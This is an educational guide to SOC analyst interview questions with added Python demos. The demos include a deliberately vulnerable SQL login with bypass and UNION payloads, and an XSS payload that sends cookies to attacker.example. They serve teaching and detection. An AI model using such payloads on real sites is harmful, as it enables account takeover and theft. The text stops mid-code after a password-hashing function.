Essential SOC Interview Questions Guide

This document contains frequently asked questions for a job interview as a security analyst in an incident response team (SOC). The questions cover topics such as basic security terminology, malware analysis, incident response procedures, and staying updated in cybersecurity. It also explains concepts such as white, gray, and black hats; port scanning; and basic definitions of blue and red teams.

SOC interview questions

➢ What should one expect?

• Security analyst
• Incident response
• General
• Network
• Web application security
• Cryptography
• Malware analysis
• Event log analysis
• Threat intelligence

✓ Security analyst
• Basic terminology
• Network fundamentals
• Operating system fundamentals
• Malware analysis fundamentals
• How to analyze attacks (phishing, malware, ...)

✓ Incident response

• Incident response procedure
• How to detect and remediate a specific type of attack (such as a golden ticket, phishing, etc.)
• Ransomware recovery process
✓ How do you stay up to date on information security?

• Read daily information security news from several sources, e.g. The Hacker News, Malwarebytes Labs, HackRead, Threatpost.
• Follow social media accounts related to cybersecurity.
• Telegram channels
• Subscribe to cybersecurity newsletters

✓ What are black hat, white hat, and gray hat hackers?
• Black hat: Black hat hackers break into systems without the owners' permission, using vulnerabilities as entry points. They hack systems illegally and use their skills to deceive and harm people. (GeeksforGeeks)

• White hat: White hat hackers are also known as ethical hackers. They are certified hackers who learn to hack through training and use their skills to secure data and websites. With the rise of cyberattacks, organizations and governments have understood that they need ethical hackers. (GeeksforGeeks)

• Gray hat: Gray hat hackers are a mix of black hat and white hat. They find vulnerabilities in systems without the owners' permission but have no malicious intent; this kind of hacking is still considered illegal. They never share information with black hat hackers. They find the problems and report them to the owner, sometimes asking for a small amount of money to fix them. (GeeksforGeeks)
✓ What is port scanning?
• Port scanning is a method of determining which ports on a network host are open and could be receiving or sending data. It consists of sending packets to specific ports of a host and analyzing the responses, and is commonly used to identify exposed services and potential vulnerabilities. (Avast)
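From the defender's side, a scan shows up as one source touching many destination ports in a short time. The following is an added example, not part of the original guide: a small Python detector over constructed, vendor-neutral firewall log lines (the format, the addresses and the thresholds are assumptions for the demo).

```python
"""Port-scan detection over firewall connection logs.

This is an added example for this guide, not code from the original
document. The log format (timestamp, src, dst, dport, action) is a
constructed, vendor-neutral one; the sample lines below are made up for
the demo. A scan is flagged when one source touches at least `min_ports`
distinct ports on one destination inside a sliding time window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.7 probes ten ports on 10.0.0.5 in five
# seconds; 198.51.100.9 is ordinary web traffic to the same host.
SAMPLE_LOG = """\
2024-05-01T10:00:00 src=203.0.113.7 dst=10.0.0.5 dport=21 action=deny
2024-05-01T10:00:00 src=203.0.113.7 dst=10.0.0.5 dport=22 action=allow
2024-05-01T10:00:01 src=203.0.113.7 dst=10.0.0.5 dport=23 action=deny
2024-05-01T10:00:01 src=203.0.113.7 dst=10.0.0.5 dport=25 action=deny
2024-05-01T10:00:02 src=203.0.113.7 dst=10.0.0.5 dport=80 action=allow
2024-05-01T10:00:02 src=203.0.113.7 dst=10.0.0.5 dport=110 action=deny
2024-05-01T10:00:03 src=203.0.113.7 dst=10.0.0.5 dport=143 action=deny
2024-05-01T10:00:03 src=203.0.113.7 dst=10.0.0.5 dport=443 action=allow
2024-05-01T10:00:04 src=203.0.113.7 dst=10.0.0.5 dport=445 action=deny
2024-05-01T10:00:04 src=203.0.113.7 dst=10.0.0.5 dport=3389 action=deny
2024-05-01T10:00:05 src=198.51.100.9 dst=10.0.0.5 dport=443 action=allow
2024-05-01T10:00:09 src=198.51.100.9 dst=10.0.0.5 dport=443 action=allow
2024-05-01T10:00:20 src=198.51.100.9 dst=10.0.0.5 dport=80 action=allow
"""


def parse_line(line):
    """Turn one 'ts key=value ...' line into a dict with typed fields."""
    ts_str, *pairs = line.split()
    fields = dict(pair.split("=", 1) for pair in pairs)
    return {
        "ts": datetime.fromisoformat(ts_str),
        "src": fields["src"],
        "dst": fields["dst"],
        "dport": int(fields["dport"]),
        "action": fields["action"],
    }


def detect_port_scans(log_text, min_ports=8, window=timedelta(seconds=60)):
    """Return {(src, dst): sorted distinct ports} for every source/destination
    pair that hit at least `min_ports` distinct ports within `window`."""
    events = sorted(
        (parse_line(ln) for ln in log_text.splitlines() if ln.strip()),
        key=lambda e: e["ts"],
    )
    by_pair = defaultdict(list)
    for ev in events:
        by_pair[(ev["src"], ev["dst"])].append(ev)

    hits = {}
    for pair, evs in by_pair.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until the span fits inside `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports = {e["dport"] for e in evs[start:end + 1]}
            if len(ports) >= min_ports:
                # Accumulate every port seen in a qualifying window.
                hits[pair] = sorted(set(hits.get(pair, ())) | ports)
    return hits


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst}, ports {ports}")
```

The threshold and window are the tuning knobs an analyst adjusts per environment; many production rules additionally weight denied connections more heavily than allowed ones, since a scanner hits far more closed ports than a legitimate client does.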


✓ Do you know any programming languages?

• Although this depends on you, basic knowledge of a programming or scripting language is an advantage in the interview.

✓ How can the Blue Team and the Red Team be defined in basic terms?
• The red team is the attacking side; the blue team is the defending side.

✓ What is a firewall?
• A firewall is a device or software that allows or blocks network traffic according to a set of rules.

✓ Explain security misconfiguration.

• It is a security weakness caused by an incomplete or incorrect configuration of a system or application.
✓ Explain vulnerability, risk and threat.
• Vulnerability: A weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source. (source: NIST)

• Risk: The level of impact on an organization's operations (including mission, functions, image, or reputation), assets, or individuals resulting from the operation of an information system, given the potential impact of a threat and the likelihood of that threat occurring. (src: NIST)

• Threat: Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, individuals, other organizations, or the Nation through a system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. (src: NIST)

✓ What is compliance?
• Following a set of rules established by an organization, an independent party, or a government (for example, a regulation or an industry standard).

✓ What is MITRE ATT&CK?

• MITRE ATT&CK® is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. (MITRE ATT&CK)

✓ Do you have any projects we can see?

• If you have a project to showcase, prepare it before the interview.

✓ Explain 2FA.
• Two-factor authentication (2FA) is an additional layer of security used to ensure that people trying to access an online account are who they say they are. First, the user enters their username and password. Then, instead of gaining access immediately, they are asked to provide another piece of information (for example, a one-time code from an authenticator app or a hardware token). (Authy)

✓ Could you name some endpoint security products in general?
• Antivirus
• EDR
• XDR
• DLP

✓ What are HIDS and NIDS?

• HIDS: Host Intrusion Detection System. A HIDS runs on each individual host and monitors that host's activity (processes, files, local logs).
• NIDS: Network Intrusion Detection System. A NIDS sits on the network and inspects the traffic passing through a monitored segment.

✓ What is the CIA triad?

• The three letters of the 'CIA triad' stand for Confidentiality, Integrity, and Availability. The CIA triad is a common model that forms the basis for the development of security systems. It is used to find vulnerabilities and methods for creating solutions. (Fortinet)

• Confidentiality: Confidentiality involves an organization's efforts to ensure that data remains confidential or private. A key component of maintaining confidentiality is ensuring that people without the proper authorization cannot access assets important to the business.

• Integrity: Integrity consists of ensuring that data is reliable and has not been tampered with. The integrity of data is maintained only if the data is authentic, accurate, and reliable.

• Availability: Systems, networks, and applications must work as they should, when they should. Additionally, people with access to specific information should be able to consume it when needed, and accessing the data should not take an excessive amount of time.
✓ What is AAA?

• Authentication: Authentication involves a user providing information about who they are. Users present login credentials that affirm they are who they claim to be. (Fortinet)

• Authorization: Authorization follows authentication. During authorization, a user can be granted privileges to access certain areas of a network or system. (Fortinet)

• Accounting: Accounting keeps track of user activity while users are logged in to a network by tracking information such as how long they were connected, the data they sent or received, their Internet Protocol (IP) address, the Uniform Resource Identifier (URI) they used, and the different services they accessed. (Fortinet)
✓ What is the Cyber Kill Chain?
• Developed by Lockheed Martin, the Cyber Kill Chain® framework is part of the Intelligence Driven Defense® model for the identification and prevention of cyber intrusion activity. The model identifies what adversaries must complete in order to achieve their objective.
• The seven steps of the Cyber Kill Chain® (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives) enhance visibility into an attack and enrich an analyst's understanding of an adversary's tactics, techniques, and procedures. (Lockheed Martin)
✓ What is SIEM?
• Security Information and Event Management (SIEM) is a security solution built on the real-time collection and logging of events across an environment. The real objective of collecting those events is to detect security threats.

• SIEM products generally have a number of features. The ones that interest SOC analysts most are filtering the collected data and creating alerts (correlation rules) for suspicious events.

✓ What is an Indicator of Compromise (IOC)?

• Indicators of compromise (IOCs) serve as forensic evidence of potential intrusions on a host system or network. These artifacts enable information security (InfoSec) professionals and system administrators to detect intrusion attempts or other malicious activities. Security researchers use IOCs to better analyze a particular malware's techniques and behaviors. IOCs also provide actionable threat intelligence that can be shared within the community to further improve an organization's incident response and remediation strategies. (Trend Micro)

✓ What are Indicators of Attack (IOA)?

• Indicators of Attack (IOAs) demonstrate the intentions behind a cyberattack and the techniques used by the threat actor to accomplish their objectives. The specific malicious tools used to carry out the attack, such as malware, ransomware, or advanced threats, matter little when analyzing IOAs; the focus is on the behavior.
✓ What are true positive and false positive alerts?

True positive:
• If the situation to be detected and the detected situation (the triggered alert) are the same, it is a True Positive alert. For example, suppose someone takes a PCR test to check whether they are positive for Covid-19 and the result is positive. It is a True Positive because the condition the test is meant to detect (having Covid-19) and the detected condition (being a Covid-19 patient) are the same. This is a true positive alert.

• Suppose there is a rule to detect SQL injection attacks and this rule was triggered by a request to the following URL. The alert is indeed a 'True Positive' because there was a real SQL injection attack.
[Link] 1=1

False positive:
• In short, it is a false alarm. For example, if there is a security camera at your house and it alerts you because of your cat's movements, that is a false alert.

• Now consider a request whose parameter value contains the SQL keyword 'Union'. If a SQL injection alert fires for that URL, it is a false positive, because the word 'Union' refers to a sports team and not to a SQL injection attack.
✓ What is the OSI model? Explain each layer.

• The Open Systems Interconnection model (OSI model) is a conceptual model that describes the communication functions of a telecommunications or computing system in universal terms, regardless of its underlying internal technology and specific protocol suites. (Wikipedia)

• Physical layer: The physical layer is responsible for the transmission and reception of unstructured raw data between a device, such as a network interface controller, an Ethernet hub or a network switch, and a physical transmission medium. It converts digital bits into electrical, radio, or optical signals.

• Data link layer: The data link layer provides node-to-node data transfer, a link between two directly connected nodes. It detects and possibly corrects errors that may occur in the physical layer. It defines the protocol to establish and terminate a connection between two physically connected devices, and the protocol for flow control between them. IEEE 802 divides the data link layer into two sublayers: a. Medium Access Control (MAC) layer, responsible for controlling how devices on a network gain access to a medium and permission to transmit data; b. Logical Link Control (LLC) layer, responsible for identifying and encapsulating network layer protocols, and for error checking and frame synchronization.

• Network layer: The network layer provides the functional and procedural means of transferring packets from one node to another connected in 'different networks'.

• Transport layer: The transport layer provides the functional and procedural means of transferring variable-length data sequences from a source host to a destination host, from one application to another, across a network, while maintaining quality of service functions. Transport protocols may be connection-oriented or connectionless.

• Session layer: The session layer controls the dialogues (connections) between computers: it establishes, manages, and terminates the connections between the local and remote application. Since name resolution protocols such as DNS are commonly placed at this level of the model, typical session layer functions include user log-in (establishment), name lookup (management) and user log-off (termination). Authentication protocols are also built into most client software, such as FTP clients and the NFS client for Microsoft networks.

• Presentation layer: The presentation layer establishes data formatting and data translation into a format specified by the application layer during the encapsulation of outgoing messages while they are passed down the protocol stack, and possibly reverses this during the de-encapsulation of incoming messages when they are passed up the protocol stack. For this very reason, outgoing messages during encapsulation are converted into a format specified by the application layer, while the conversion for incoming messages during de-encapsulation is reversed.

• Application layer: The application layer is the OSI layer closest to the end user, which means both the OSI application layer and the user interact directly with the software application that implements a component of communication between the client and server, such as a file browser or Microsoft Word. Such application programs fall outside the scope of the OSI model unless they are directly integrated into the application layer through communication functions, as is the case with applications such as web browsers and email programs. Other examples of such software are the Microsoft networking software for file and printer sharing and the Unix/Linux Network File System client for access to shared file resources.
✓ What is the three-way handshake?

• TCP uses a three-way handshake to establish a reliable connection. The connection is full duplex, and both sides synchronize (SYN) and acknowledge (ACK) each other.

• The client chooses an initial sequence number, set in the first packet (SYN). The server also chooses its own initial sequence number, set in the SYN/ACK packet.

• Each side acknowledges the other's sequence number by incrementing it; this is the acknowledgement number. The use of sequence numbers and acknowledgement numbers allows both sides to detect missing or out-of-order segments.

• Once the connection is established, ACKs are usually produced for each segment. The connection will eventually end with a RST (reset or abort the connection) or FIN (gracefully end the connection).
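Interviewers often follow up by asking for the actual sequence and acknowledgement numbers in each of the three segments. The following is an added example, not part of the original guide: a pure-Python model of the exchange (no packets are sent) in which both sides pick a random initial sequence number and each acknowledgement is the peer's number plus one. The `Endpoint`/`Segment` names and the state labels are assumptions made for the demo.

```python
"""Simulated TCP three-way handshake with sequence/acknowledgement arithmetic.

Added example for this guide, not code from the original document. It is a
pure-Python model of the exchange (nothing is sent on the wire). Each side
picks a random 32-bit initial sequence number (ISN) as a real stack would;
the +1 in every acknowledgement reflects the SYN flag consuming one
sequence number. Sequence numbers wrap modulo 2**32.
"""
import random
from dataclasses import dataclass
from typing import List, Optional

MOD = 1 << 32


def nxt(seq: int) -> int:
    """Next sequence number, with 32-bit wraparound."""
    return (seq + 1) % MOD


@dataclass
class Segment:
    flags: str            # "SYN", "SYN/ACK" or "ACK"
    seq: int              # sequence number carried by the segment
    ack: Optional[int]    # acknowledgement number, None when the ACK flag is clear


class Endpoint:
    def __init__(self, name: str, isn: Optional[int] = None):
        self.name = name
        self.isn = random.getrandbits(32) if isn is None else isn
        self.snd_nxt = self.isn      # next sequence number this side will send
        self.rcv_nxt = None          # next sequence number expected from the peer
        self.state = "CLOSED"


def handshake(client: Endpoint, server: Endpoint) -> List[Segment]:
    """Run SYN -> SYN/ACK -> ACK between two endpoints and return the segments."""
    # 1. Client -> Server: SYN carrying the client's ISN.
    syn = Segment("SYN", client.snd_nxt, None)
    client.snd_nxt = nxt(client.snd_nxt)          # SYN occupies one sequence number
    client.state = "SYN_SENT"

    # 2. Server -> Client: SYN/ACK with ack = client ISN + 1 and seq = server ISN.
    server.rcv_nxt = nxt(syn.seq)
    synack = Segment("SYN/ACK", server.snd_nxt, server.rcv_nxt)
    server.snd_nxt = nxt(server.snd_nxt)
    server.state = "SYN_RECEIVED"

    # 3. Client -> Server: ACK. The client checks that the server acknowledged
    #    exactly its ISN + 1 (a wrong value is how a bogus SYN/ACK or a lost
    #    segment is noticed), then acknowledges the server's ISN.
    if synack.ack != client.snd_nxt:
        raise ValueError(f"{client.name}: bad ack {synack.ack}, expected {client.snd_nxt}")
    client.rcv_nxt = nxt(synack.seq)
    ack = Segment("ACK", client.snd_nxt, client.rcv_nxt)
    client.state = "ESTABLISHED"

    if ack.ack != server.snd_nxt:
        raise ValueError(f"{server.name}: bad ack {ack.ack}, expected {server.snd_nxt}")
    server.state = "ESTABLISHED"
    return [syn, synack, ack]


if __name__ == "__main__":
    c, s = Endpoint("client"), Endpoint("server")
    for seg in handshake(c, s):
        print(f"{seg.flags:<8} seq={seg.seq:<10} ack={seg.ack}")
    print(c.state, s.state)
```

The check on each acknowledgement is the same one a real stack performs; it is also why a SYN flood (many SYNs, no third ACK) leaves the server parked in SYN_RECEIVED with resources allocated.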
✓ What is the TCP/IP model? Explain the difference between the OSI and TCP/IP models.

• The TCP/IP model is the default method of data communication on the Internet. It was developed by the United States Department of Defense to enable accurate and correct transmission of data between devices.

• TCP/IP divides communication tasks into layers that keep the process standardized, without hardware and software vendors managing it on their own. Data packets must pass through four layers before they are received by the destination device; TCP/IP then passes back through the layers in reverse order to put the message back into its original format.

✓ The TCP/IP model contains four layers. The layers are:

• Application layer
• Transport layer
• Internet layer
• Network access layer

✓ The difference:
• The OSI model has seven layers, the TCP/IP model has four. The TCP/IP application layer covers the OSI application, presentation and session layers, and its network access layer covers the OSI data link and physical layers; the transport and internet (network) layers correspond one to one. OSI is a conceptual reference model, whereas TCP/IP describes the protocol suite actually used on the Internet.

✓ What is ARP?
• The Address Resolution Protocol (ARP) is a communication protocol used to discover the link layer address, such as a MAC address, associated with a given Internet layer address, typically an IPv4 address. This mapping is a critical function in the Internet protocol suite.

✓ What is DHCP?
• The Dynamic Host Configuration Protocol (DHCP) is a network management protocol used on Internet Protocol (IP) networks for automatically assigning IP addresses and other communication parameters to devices connected to the network, using a client-server architecture.
✓ Could you name some network security products in general?

• Firewall
• IDS
• IPS
• WAF

✓ What is the main difference between IDS and IPS?

• An IDS only detects and alerts on suspicious traffic, whereas an IPS sits inline and can prevent/block it.

✓ How can you protect yourself from man-in-the-middle attacks?

• Although the answer depends on the scenario, encryption with authentication of the remote party (for example, TLS with proper certificate validation) is the key to staying safe.
✓ What are HTTP response codes?
• Three-digit status codes returned by a web server in response to a request, grouped by class: 1xx informational, 2xx success (e.g. 200 OK), 3xx redirection (e.g. 301, 302), 4xx client error (e.g. 401 Unauthorized, 403 Forbidden, 404 Not Found), 5xx server error (e.g. 500, 503).

✓ Explain the OWASP Top 10.

• The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. (OWASP)

✓ What is SQL injection?

• SQL injection is a critical attack method in which a web application includes unsanitized user-supplied data directly in its SQL queries, so that the attacker's input is parsed as part of the query.

✓ Explain the types of SQL injection.

There are 3 types of SQL injection. These are:

• In-band SQLi (classic SQLi): If the SQL query is sent and its result is returned through the same channel (for example, the HTTP response shows the query's output or an error message), it is called in-band SQLi. It is easier for attackers to exploit than the other categories.

• Inferential SQLi (blind SQLi): When the application does not return the query's result or errors in its response, the attacker must infer it from side effects such as a true/false difference in the page or a time delay. This is called inferential or blind SQLi, because the response itself cannot be seen.

• Out-of-band SQLi: If the result of the SQL query is communicated through a different channel, this type of SQLi is called out-of-band SQLi. For example, if the attacker receives the answers to their SQL queries via DNS, this is out-of-band SQLi.
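The definition above ("unsanitized data included directly in the query") and the in-band category are easiest to understand side by side in code. The following is an added example, not part of the original guide: a deliberately vulnerable login function built by string concatenation, its parameterized fix, and two classic in-band payloads run against an in-memory SQLite database. The table, rows and payloads are constructed for the demo.

```python
"""SQL injection: string-built query beside its parameterised fix (sqlite3).

Added example for this guide, not code from the original document. The
schema, rows and payloads are constructed. login_vulnerable() splices user
input into the SQL text exactly as the definition above describes;
login_safe() binds the same values as parameters, so the database engine
never parses them as SQL. Both payloads are in-band: the result comes back
in the same response as the query.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct-horse", "admin"), ("bob", "battery-staple", "user")],
    )
    return db


def login_vulnerable(db, username, password):
    """Deliberately vulnerable: unsanitised input becomes part of the SQL text."""
    query = ("SELECT username, role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return db.execute(query).fetchall()


def login_safe(db, username, password):
    """Same logic with bound parameters: the '?' placeholders receive data, never code."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchall()


# Payload 1: comment out the password check (authentication bypass).
BYPASS_USER, BYPASS_PASS = "alice'--", "anything"
# Payload 2: UNION-based in-band injection that dumps every credential.
UNION_USER = "' UNION SELECT username, password FROM users--"


if __name__ == "__main__":
    db = make_db()
    print("bypass, vulnerable:", login_vulnerable(db, BYPASS_USER, BYPASS_PASS))
    print("bypass, safe      :", login_safe(db, BYPASS_USER, BYPASS_PASS))
    print("union,  vulnerable:", login_vulnerable(db, UNION_USER, "x"))
    print("union,  safe      :", login_safe(db, UNION_USER, "x"))
```

With the parameterized version the same strings are simply compared as literal usernames and match nothing, which is the whole point: prepared statements, not keyword filtering, are the fix on the development side.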
✓ How to prevent SQL injection vulnerability?

• On the development side, the vulnerability is prevented by never concatenating user input into SQL: use parameterized (prepared) queries, and treat input validation as a second line of defense. On the SOC side, the following checks help detect injection attempts in web requests:

• When examining a web request, check every field that comes from the user: because SQL injection attacks are not limited to form fields, you should also check HTTP request headers such as User-Agent.

• Look for SQL keywords: look for words like INSERT, SELECT, UNION, WHERE within the data received from users.

• Check for special characters: look for apostrophes ('), double hyphens (--), semicolons (;) or parentheses used in SQL, or other special characters frequently used in SQL injection attacks, within the data received from the user.

• Familiarize yourself with the most commonly used SQL injection payloads: although payloads vary depending on the web application, attackers keep using a number of common payloads to test for SQL injection vulnerabilities. If you are familiar with these payloads, you will easily spot SQL injection attempts.
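The checklist above, and the True Positive / False Positive discussion earlier (the sports team called 'Union'), both come down to how a detection rule is written. The following is an added example, not part of the original guide: a naive keyword rule and a tuned rule that requires SQL syntax around the keyword, run over a handful of constructed requests (URLs, header values and the analyst verdicts are all made up for the demo), with user-controlled headers inspected as well as query parameters.

```python
"""Naive vs tuned SQL injection detection rules over web requests.

Added example for this guide, not code from the original document. The
requests below are constructed. The block illustrates both the True
Positive / False Positive discussion ('Union' as a team name) and the
detection checklist (inspect every user-controlled field, headers included).
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Naive rule: any SQL keyword, or an apostrophe, anywhere in user-supplied data.
NAIVE = re.compile(r"\b(union|select|insert|update|delete|where|drop)\b|'", re.I)

# Tuned rule: the keyword must appear with SQL syntax around it, or a classic
# tautology / comment / stacked-query construct must be present.
TUNED = re.compile(
    r"union\s+(all\s+)?select\b"            # UNION [ALL] SELECT
    r"|\bselect\b.+\bfrom\b"                # SELECT ... FROM
    r"|'\s*(or|and)\s+['\d]"                # ' OR 1 / ' OR '
    r"|\b(or|and)\s+\d+\s*=\s*\d+"          # OR 1=1 tautology
    r"|(--|#|/\*)\s*$"                      # trailing SQL comment
    r"|;\s*(drop|delete|update|insert)\b",  # stacked query
    re.I | re.S,
)


def user_controlled_fields(request):
    """Yield (location, value) for every user-influenced part of a request:
    decoded query parameters plus a few headers attackers like to abuse."""
    parts = urlsplit(request["url"])
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        yield f"query:{key}", unquote_plus(value)
    for header in ("User-Agent", "Referer", "Cookie"):
        if header in request.get("headers", {}):
            yield f"header:{header}", request["headers"][header]


def evaluate(request, rule):
    """Return the names of the fields the rule fires on (empty list = no alert)."""
    return [loc for loc, val in user_controlled_fields(request) if rule.search(val)]


# Constructed sample requests with the analyst's verdict for each.
REQUESTS = [
    {"url": "/products?id=1' OR 1=1--", "headers": {}, "verdict": "TP"},
    {"url": "/teams?name=Manchester+Union", "headers": {}, "verdict": "FP"},
    {"url": "/news?q=select+the+best+offers", "headers": {}, "verdict": "FP"},
    {"url": "/login",
     "headers": {"User-Agent": "Mozilla/5.0' UNION SELECT user,pass FROM users--"},
     "verdict": "TP"},
]


def score(rule):
    """Count (true positives, false positives) of a rule against REQUESTS."""
    tp = fp = 0
    for req in REQUESTS:
        if evaluate(req, rule):
            if req["verdict"] == "TP":
                tp += 1
            else:
                fp += 1
    return tp, fp


if __name__ == "__main__":
    for name, rule in (("naive", NAIVE), ("tuned", TUNED)):
        print(f"{name}: TP/FP = {score(rule)}")
        for req in REQUESTS:
            print(f"  {req['verdict']} {req['url']:<40} fired on {evaluate(req, rule)}")
```

The tuned pattern is still a heuristic (encoded or obfuscated payloads can slip past it), which is why the request itself, not just the keyword match, has to be read before an alert is closed.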

✓ What is XSS and how can it be prevented?

• Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. (OWASP)

• For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a web page. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitized.

• However, frameworks are not perfect, and security gaps still exist in popular frameworks like React and Angular. Output encoding (matched to the context where the data is inserted: HTML body, attribute, JavaScript, URL) and HTML sanitization help address those gaps.
✓ Explain the types of XSS.

1. Reflected XSS (non-persistent): A non-persistent type of XSS in which the payload must be included in the request (for example, in a URL parameter) and is reflected back in the response. It is the most common type of XSS.

2. Stored XSS (persistent): A type of XSS in which the attacker can permanently store the XSS payload in the web application (for example, in a comment or profile field), so it is served to every user who views it. Compared to the other types, stored XSS is the most dangerous.

3. DOM-based XSS: DOM-based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM 'environment' in the victim's browser used by the original client-side script, so that the client-side code runs in an 'unexpected' manner. (OWASP)
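Output encoding, mentioned above as the fix, has to match the context the value lands in. The following is an added example, not part of the original guide: a reflected-XSS page fragment that echoes a search term unescaped, beside the same fragment with HTML encoding applied, tested with one payload for the HTML body and one for an attribute value. The page fragments and payloads are constructed for the demo.

```python
"""Reflected XSS: unescaped output next to context-aware output encoding.

Added example for this guide, not code from the original document. The page
fragments and the payloads are constructed for the demo. html.escape() from
the standard library is the encoder; quote=True also encodes the quote
characters, which matters when the value lands inside an HTML attribute.
"""
from html import escape

# Payload for the HTML body context: a script tag that exfiltrates cookies.
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
# Payload for the attribute context: closes the value and adds an event handler.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def search_page_vulnerable(query):
    """Echoes the search term straight into the page (deliberately vulnerable)."""
    return (f"<h1>Results for: {query}</h1>\n"
            f'<input name="q" value="{query}">')


def search_page_safe(query):
    """Same page with the value HTML-encoded in both contexts."""
    q = escape(query, quote=True)
    return (f"<h1>Results for: {q}</h1>\n"
            f'<input name="q" value="{q}">')


def has_injected_markup(html, original_value):
    """True if a user value containing markup characters survived verbatim in the
    output, i.e. it can change the page structure instead of being shown as text."""
    return original_value in html and any(ch in original_value for ch in '<>"\'')


if __name__ == "__main__":
    for payload in (BODY_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", has_injected_markup(search_page_vulnerable(payload), payload))
        print("safe      :", has_injected_markup(search_page_safe(payload), payload))
```

Note that `escape()` without `quote=True` would still leave the attribute payload live, because `"` is what breaks out of the attribute; the encoder must cover every character that is special in the target context.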

✓ What is IDOR?
• Insecure Direct Object Reference (IDOR) is a vulnerability caused by a missing or incorrectly implemented authorization check. It allows a user to access an object (for example, a record referenced by an ID in the URL) that belongs to another user.

• Among the web application security risks published in the OWASP Top 10 2021, IDOR, as part of 'Broken Access Control', ranks first.

✓ What is RFI?

• Remote File Inclusion (RFI) is a security vulnerability that occurs when a web application includes a file from a different (attacker-controlled) server without sanitizing the data obtained from the user.

✓ What is LFI?

• Local File Inclusion (LFI) is a security vulnerability that occurs when a local file is included without sanitizing the data obtained from the user, which lets an attacker read (and sometimes execute) files on the server.

✓ Explain the difference between LFI and RFI.

• LFI differs from RFI in that the file to be included is on the same web server where the web application is hosted, whereas in RFI it is fetched from a remote server.
✓ Explain CSRF.

• Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. (OWASP)

✓ What is a WAF?

• A web application firewall (WAF) helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web applications from attacks such as cross-site request forgery, cross-site scripting (XSS), file inclusion, and SQL injection, among others. A WAF is a protocol layer 7 defense (in the OSI model), and is not designed to defend against all types of attacks.
✓ What are encoding, hashing, and encryption?
• Encoding: Converting data into a desired format required for exchange between different systems (for example, Base64). It uses no secret and is reversible by anyone.

• Hashing: Maintains the integrity of a message or data. Any change made to it can be noticed by comparing hash values.

• Encryption: Ensures the confidentiality of data; a key is required to decrypt and access it.

✓ What is the difference between hashing and encryption?

• Hashing: Hashing is the process of converting information into a digest using a hash function. The original information cannot be retrieved from the hash by any means. (GeeksforGeeks)

• Encryption: Encryption is the process of converting a normal readable message, known as plaintext, into a garbled or unreadable message known as ciphertext. The ciphertext obtained from encryption can easily be transformed back into plaintext using the decryption key. (GeeksforGeeks)

✓ The difference:
• A hash function does not need a key to operate.
• While the output length can vary in encryption algorithms (it follows the input length), hashing algorithms have a fixed output length.
• Encryption is a two-way function that includes encryption and decryption, whereas hashing is a one-way function that turns plaintext into a unique, irreversible digest.

✓ What are salted hashes?

• A salt is a random value added to the hashing process to enforce uniqueness of the output, increase its complexity without increasing user requirements, and mitigate password attacks such as (rainbow) hash tables.
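The three properties just listed (encoding is reversible without a secret, hashing is one-way with fixed-length output, a salt makes identical passwords hash differently) can be checked directly with the Python standard library. The following is an added example, not part of the original guide; the passwords, fixed salts and iteration count are assumptions made for the demo.

```python
"""Encoding vs hashing vs salted password hashing with the standard library.

Added example for this guide, not code from the original document. The
passwords in the tests and any fixed salt passed in are for illustration
only; new_credential() draws a random salt from os.urandom() when none is
supplied. The PBKDF2 iteration count is an assumption and should be tuned
for the target hardware.
"""
import base64
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 100_000  # assumption for the demo; raise in production


def encode(data: bytes) -> str:
    """Encoding: reversible by anyone, no secret involved. Changes only the
    representation (here Base64) so the bytes survive a text channel."""
    return base64.b64encode(data).decode("ascii")


def decode(text: str) -> bytes:
    return base64.b64decode(text)


def digest(data: bytes) -> str:
    """Hashing: fixed-length, one-way. The same input always gives the same
    output, which is why unsalted password hashes are lookup-table friendly."""
    return hashlib.sha256(data).hexdigest()


def new_credential(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted, iterated hash suitable for storage. Returns (salt, hash); the
    salt is stored in the clear next to the hash, it is not a secret."""
    salt = os.urandom(16) if salt is None else salt
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, derived

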